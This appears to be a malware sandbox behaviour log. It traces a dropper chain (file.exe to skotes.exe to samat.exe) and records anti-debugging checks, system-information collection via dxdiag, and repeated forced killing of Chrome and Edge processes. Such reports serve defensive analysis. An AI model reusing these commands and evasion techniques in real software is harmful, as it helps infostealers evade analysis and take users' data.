Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053203B3 rdtsc

0_2_053203B3

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00007FF7E12CD12C

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

8_2_00007FF8B7E8DE80

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12E3480 GetProcessHeap,

7_2_00007FF7E12E3480

Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CD30C SetUnhandledExceptionFilter,	7_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CD30C SetUnhandledExceptionFilter,	8_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7E8FBFC SetUnhandledExceptionFilter,	8_2_00007FF8B7E8FBFC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7E8FA14 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B7E8FA14
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7E8E8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B7E8E8FC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EC0854 SetUnhandledExceptionFilter,	8_2_00007FF8B7EC0854
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EBFA68 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B7EBFA68
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EC066C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B7EC066C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EE1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B7EE1A80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EE1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B7EE1030
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8112920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B8112920
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8261960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B8261960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8261390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B8261390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8271390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B8271390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8271960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B8271960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8283248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8B8283248
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8282C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF8B8282C90

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7E87EB0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free,

8_2_00007FF8B7E87EB0

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7E88D60 PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,PyArg_ParseTuple,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy,

8_2_00007FF8B7E88D60

Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12E9570 cpuid

7_2_00007FF7E12E9570

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
